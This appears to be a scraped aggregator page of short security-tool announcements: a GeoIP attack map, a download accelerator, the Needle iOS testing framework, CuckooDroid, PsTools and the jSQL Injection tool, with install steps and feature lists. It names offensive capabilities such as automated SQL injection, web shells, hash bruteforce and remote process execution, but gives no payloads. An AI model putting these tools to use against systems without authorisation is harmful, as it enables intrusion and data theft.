                      -h, --help show this help message and exit
                      -v, --version show program's version number and exit
                      I would appreciate any feedback! Cheers, Khalil.


                      geoip-attack-map - Cyber Security GeoIP Attack Map Visualization

                      $
                      0
                      0

                      This geoip attack map visualizer was developed to display network attacks on your organization in real time. The data server follows a syslog file, and parses out source IP, destination IP, source port, and destination port. Protocols are determined via common ports, and the visualizations vary in color based on protocol type. CLICK HERE for a demo video. This project would not be possible if it weren't for Sam Cappella, who created a cyber defense competition network traffic visualizer for the 2015 Palmetto Cyber Defense Competition. I mainly used his code as a reference, but I did borrow a few functions while creating the display server, and visual aspects of the webapp. I would also like to give special thanks to Dylan Madisetti as well for giving me advice about certain aspects of my implementation.

                      Important
                      This program relies entirely on syslog, and because all appliances format logs differently, you will need to customize the log parsing function(s). If your organization uses a security information and event management system (SIEM), it can probably normalize logs to save you a ton of time writing regex. 1. Send all syslog to SIEM. 2. Use SIEM to normalize logs. 3. Send normalized logs to the box (any Linux machine running syslog-ng will work) running this software so the data server can parse them.

                      Installation
                      Run the following commands to install all required dependencies (tested on Ubuntu 14.04 x64)
                      # sudo apt-get install python3-pip redis-server
                      # sudo pip3 install tornado tornado-redis redis maxminddb

                      Setup
                      1. Make sure in /etc/redis/redis.conf to change bind 127.0.0.1 to bind 0.0.0.0 if you plan on running the DataServer on a different machine than the AttackMapServer.
                      2. Make sure that the WebSocket address in /AttackMapServer/index.html points back to the IP address of the AttackMapServer so the browser knows the address of the WebSocket.
                      3. Download the MaxMind GeoLite2 database, and change the db_path variable in DataServer.py to the wherever you store the database.
                        • ./db-dl.sh
                      4. Add headquarters latitude/longitude to hqLatLng variable in index.html
                      5. Use syslog-gen.sh to simulate dummy traffic "out of the box."
                      6. IMPORTANT: Remember, this code will only run correctly in a production environment after personalizing the parsing functions. The default parsing function is only written to parse ./syslog-gen.sh traffic.



                      hget - Rocket Fast, Interruptable, Resumable Download Accelerator

                      $
                      0
                      0
                      Rocket fast download accelerator written in golang. Current program working in unix system only.
                      NOTE : hget is currently on highly development, its usage, architecture and code may change anytime at the future. It would be great if you can contribute whatever features that you want to use, I will take a look when have time.

                      Install
                      $ go get -d github.com/huydx/hget
                      $ cd $GOPATH/src/github.com/huydx/hget
                      $ make clean install
                      Binary file will be built at ./bin/hget, you can copy to /usr/bin or /usr/local/bin and even alias wget hget to replace wget totally :P

                      Usage
                      hget [Url] [-n parallel] [-skip-tls false] //to download url, with n connections, and not skip tls certificate
                      hget tasks //get interrupted tasks
                      hget resume [TaskName | URL] //to resume task
                      To interrupt any on-downloading process, just ctrl-c or ctrl-d at the middle of the download, hget will safely save your data and you will be able to resume later

                      Download


                      Resume



                      needle - The iOS Security Testing Framework

                      $
                      0
                      0

                      Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps.

                      Description
                      Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like " drozer " that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent.
                      Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.​ The only requirement in order to run Needle effectively is a jailbroken device.
                      Needle is open source software, maintained by MWR InfoSecurity .

                      Installation
                      See the Installation Guide in the project Wiki for details.

                      Supported Platforms
                      • Workstation : Needle has been successfully tested on both Kali and OSX
                      • Device : both iOS 8 and 9 are currently supported

                      Usage
                      Usage instructions (for both standard users and contributors) can be found in the project Wiki .
                      A complete walkthrough on how to quickly get up to speed with Needle can be found on the MWR Labs website: https://labs.mwrinfosecurity.com/blog/needle-how-to/


                      CuckooDroid - Automated Android Malware Analysis with Cuckoo Sandbox

                      $
                      0
                      0

                      CuckooDroid is an extension of Cuckoo Sandbox the Open Source software for automating analysis of suspicious files, CuckooDroid brigs to cuckoo the capabilities of execution and analysis of android application.

                      Installation - Easy integration script:
                      git config --global user.email "you@example.com"
                      git config --global user.name "Your Name"
                      git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo -b 1.2
                      cd cuckoo
                      git remote add droid https://github.com/idanr1986/cuckoo-droid
                      git pull --no-edit -s recursive -X theirs droid master
                      cat conf-extra/processing.conf >> conf/processing.conf
                      cat conf-extra/reporting.conf >> conf/reporting.conf
                      rm -r conf-extra
                      echo "protobuf" >> requirements.txt

                      Documentation
                      You are advised to read the Cuckoo Sandbox documentation before using CuckooDroid!

                      Powered by:

                      Credit

                      Authors


                      PsTools - Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more

                      $
                      0
                      0


                      The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.


                      Introduction 

                       The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that help you administer your Windows NT/2K systems. Over time, I've grown a collection of similar tools, including some not included in the Resource Kits. What sets these tools apart is that they all allow you to manage remote systems as well as the local one. The first tool in the suite was PsList, a tool that lets you view detailed information about processes, and the suite is continually growing. The "Ps" prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named "ps", so I've adopted this prefix for all the tools in order to tie them together into a suite of tools named PsTools.
                      Note: some anti-virus scanners report that one or more of the tools are infected with a "remote admin" virus. None of the PsTools contain viruses, but they have been used by viruses, which is why they trigger virus notifications.
                      The tools included in the PsTools suite, which are downloadable as a package, are:
                      • PsExec - execute processes remotely
                      • PsFile - shows files opened remotely
                      • PsGetSid - display the SID of a computer or a user
                      • PsInfo - list information about a system
                      • PsPing - measure network performance
                      • PsKill - kill processes by name or process ID
                      • PsList - list detailed information about processes
                      • PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
                      • PsLogList - dump event log records
                      • PsPasswd - changes account passwords
                      • PsService - view and control services
                      • PsShutdown - shuts down and optionally reboots a computer
                      • PsSuspend - suspends processes
                      • PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)
                      The PsTools download package includes an HTML help file with complete usage information for all the tools.

                      jSQL Injection v0.77 - Java application for automatic SQL database injection.

                      $
                      0
                      0

                      jSQL Injection is a lightweight application used to find database information from a distant server.
                      It's is free , open source and cross-platform (Windows, Linux, Mac OS X).
                      jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in distributions like Pentest Box , Parrot Security OS , ArchStrike and BlackArch Linux.

                      Installation
                      Install Java , then download the latest release of jSQL and double-click on the .jar to launch the software.
                      You can also type java -jar jsql-injection-v0.77.jar in your terminal to start the program.

                      Screenshots


                      Roadmap
                      WAF tamper, HTTP Auth Bruteforce, Translation, SOAP injection, Command line interface, Databases: Access Cassandra MongoDb and Neo4j

                      Change log
                      v0.76 Czech translation, 17 Database flavors: SQLite
                      v0.75 URI injection point, Mavenify, Upgrade to Java 7, Optimized UI
                      v0.73 Authentication: Basic Digest Negotiate NTLM and Kerberos, Database flavor selection
                      v0.7 Scan multiple URLs, Github Issue reporter, 16 Database flavors: Cubrid Derby H2 HSQLDB MariaDB and Teradata, Optimized UI
                      alpha-v0.6 Speed x2: No hex encoding, 10 Database flavors: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb and Sybase, JUnit tests, Log4j, Translation
                      0.5 SQL Shell, Uploader
                      0.4 Admin page, Hash bruteforce like MD5 and MySQL, Text encoder/decoder like Base64, Hex and MD5
                      0.3 File injection, Web Shell, Integrated terminal, Configuration backup, Update checker
                      0.2 Algorithm Time, Multi-thread control: Start Pause Resume and Stop, Log URL calls
                      0.0-0.1 Method GET POST Header and Cookie, Algorithm Normal Error and Blind, Best algorithm selection, Progression bars, Simple evasion, Proxy settings, MySQL only


                      Viewing all 5816 articles
                      Browse latest View live


                      <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>